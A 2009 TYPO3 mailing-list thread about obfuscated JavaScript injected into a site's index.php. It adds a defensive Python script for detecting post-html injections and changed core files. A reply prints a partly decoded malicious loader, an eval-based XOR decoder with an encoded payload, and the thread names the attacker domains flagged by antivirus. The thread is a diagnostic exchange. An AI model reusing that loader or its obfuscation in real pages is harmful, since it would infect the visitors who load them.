[TYPO3-english] virus/worm on Typo3 installation.

Asbjørn Morell atmorell at gmail.com
Mon Jan 12 21:14:21 CET 2009


Hi,

The line was added to index.php. I don't understand how this has happened. 
The webserver doesn't have write access to the file. It must be an extension.

Best regards.
Asbjørn Morell.


"bernd wilke" <x00nsji02 at sneakemail.com> wrote in message 
news:mailman.1.1231774859.20175.typo3-english at lists.netfielders.de...
> On Mon, 12 Jan 2009 11:56:00 +0100, Asbjørn Morell wrote:
>
>> Hi,
>>
>> When I open my homepage Avast antivirus gives me a warning:
>>
>> Access blocked to:
>> whitebiz.vn
>> wertionase.com
>>
>> I looked at the html source and there is some encrypted javascript at
>> the bottom. (see below) This can't be good. I tried replacing the Typo3
>> dir with a fresh source and cleared backend and frontend cache. Any ideas
>> where this is coming from? The webserver is hosted at servage.com
>>
>> Best regards.
>> Asbjørn Morell.
>>
>> </body>
>>
>> </html><!-- ad --><script>
> [...]
>> </script><!-- /ad -->
>
> not good?
>
> this kind of encryption is a common way to secure a piece of javascript-
> code against modification or insight. But normally you can work it out
> step by step. (use the cpu inside your head, which is better than any
> from silicon)
>
> this might be done by javascript-libraries, or your hoster (especially
> free-webspace often includes some commercials in a way you can't remove
> it)
>
> either this is included in your index.php
> or this might be inserted after your PHP-Script is run and may be
> included in every (HTML-)file on your server by 1) apache 2) proxy 3) ...
>
> try to generate a simple HTML/PHP-file in a separate directory beside
> fileadmin and look what you get if you call these files in your
> webbrowser.
>
> trying to decrypt your code I got 'til:
>
>
> window['eval'] ( window['eval'] (
> function Alha(AID){
>    function ADA(LAHah){
>        eval("var PaTLHaH=0;");
>        var ApTl=LAHah.length;
>        eval("var AIhpGl=0;");
>        while(AIhpGl< (AID.length); HGa++){
>            var HTA=AhlTH(ApHlhD,ATlAH)^AhlTH(AaTP,HHIl);
>            var PhaAaHP=AhlTH(AID,HGa);
>            ATlAH++;
>            HHIl++;
>            if(HHIl>AaTP.length)
>                HHIl=0;
>            if(ATlAH>ApHlhD.length)
>                ATlAH=0;
>            AGATI+=String.fromCharCode(PhaAaHP^HTA) + '';
>        }
>        eval(AGATI);
>        return AGATI=null;
>    }
>    catch(e){}
> }
> Alha('%32%38%36%38%36%37%33%32%61%16%00%16%3d%36%5b%3c%6e%4e%2a%38%2d%2e%
> 78%0d%01%12%3e%53%1f%6a%34%3c%22%27%33%13%3d%3e%48%3a%10%1e%1a%27%2d%47%
> 22%32%27%12%29%13%76%6b%1a%16%25%31%75%3e%71%75%5c%66%3f%7d%3d%25%38%78%
> 74%1a%07%05%2e%72%5e%74%6f%2a%1b%30%21%27%57%1c%31%6c%16%03%07%3c%0d%3a%
> 48%3e%13%13%24%74%4b%57%3f%74%10%1e%0a%00%0e%2d%2c%7d%15%0b%2f%27%6f%79%0e
> %2f%08%2e%1e%5d%76%50%45%7d%7f%7d%2d%6c%32%39%24%12%18%0e%02%3e%1d%20%33%
> 0b%79%6b%39%25%39%1b%3e%3c%3b%08%10%3f%22%70%6b%3f%4e%7d%4d%59%15%51%37%
> 37%33%06%06%28%06%33%32%22%33%78%79%4f%3b%2f%1c%30%3a%26%55%6a%6c%56%55%4c
> %54%15%2c%22%3e%1b%36%24%0a%7a%38%11%27%02%4b%25%29%2a%3c%02%21%2a%3d%3b%
> 2b%25%73%00%7a%5b%7d%27%17%2a%3f%2c%7e%67%31%40%28%24%3b%1b%0e%39%3e%3a%
> 39%15%5a%68%3b%33%3a%34%20%3f%24%06%45%42%45%24%52%4b%33%31%08%4e%5a%6b%
> 30%6d%4d%1a%72%61%48%38%2a%59%45%03%22%22%64%23%09%3a%1d%76%43%74%6c');
> )
>
> then I get syntax-errors with the function Alha(). maybe the output of
> this function may give a hint.
>
> or you use some browser-extensions to view the generated source :-/
> !!! this may execute a possible virus !!!
>
>
> bernd
> -- 
> http://www.pi-phi.de/t3v4/cheatsheet.html 
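The thread describes two defender checks: looking for markup appended after the closing </html> tag (the injected script sat between `<!-- ad -->` markers), and bernd's test of serving a plain static file next to fileadmin to tell an application-level injection from one added by the webserver or a proxy. The following is an added example (not code from the thread, TYPO3, or the poster) that automates both checks on constructed sample pages; the sample HTML, the marker regex and the hash-baseline format are assumptions.

```python
import hashlib
import re

# Constructed sample pages (not captured from the poster's site).  The "infected"
# page appends a placeholder script after </html>, mirroring the shape reported
# in the thread; the script body itself is a harmless stand-in.
CLEAN_PAGE = "<html><head><title>Site</title></head><body><p>Hi</p></body>\n</html>\n"
INFECTED_PAGE = CLEAN_PAGE + "<!-- ad --><script>/* obfuscated loader */</script><!-- /ad -->\n"

# Everything after the last closing </html> tag; DOTALL so newlines are included.
TRAILING_RE = re.compile(r"</html>(.*)$", re.IGNORECASE | re.DOTALL)
# Tags and comment markers that should never appear after </html> on a normal page.
SUSPICIOUS_RE = re.compile(r"<script\b|<iframe\b|<!--\s*/?ad\s*-->", re.IGNORECASE)


def trailing_markup(html: str) -> str:
    """Return whatever follows </html>, stripped of whitespace ('' on a clean page)."""
    m = TRAILING_RE.search(html)
    return m.group(1).strip() if m else ""


def has_injected_script(html: str) -> bool:
    """True if script/iframe tags or the 'ad' comment markers follow </html>."""
    return bool(SUSPICIOUS_RE.search(trailing_markup(html)))


def injection_layer(app_html: str, static_html: str) -> str:
    """bernd's test: compare a TYPO3-rendered page with a plain static file served
    from a sibling directory.  If the static file is modified too, PHP is not the
    source and the webserver or a proxy in front of it is altering responses."""
    app, static = has_injected_script(app_html), has_injected_script(static_html)
    if app and static:
        return "webserver-or-proxy"
    if app:
        return "application"
    return "none"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def changed_files(baseline: dict, current: dict) -> list:
    """Compare {path: sha256} of core files (index.php etc.) recorded from a clean
    release against the current tree; returns paths that differ or are new."""
    return sorted(p for p, h in current.items() if baseline.get(p) != h)
```

Record the baseline hashes from a freshly unpacked release, since a file the webserver cannot write to may still be altered by a vulnerable extension running as the same user or by FTP credentials.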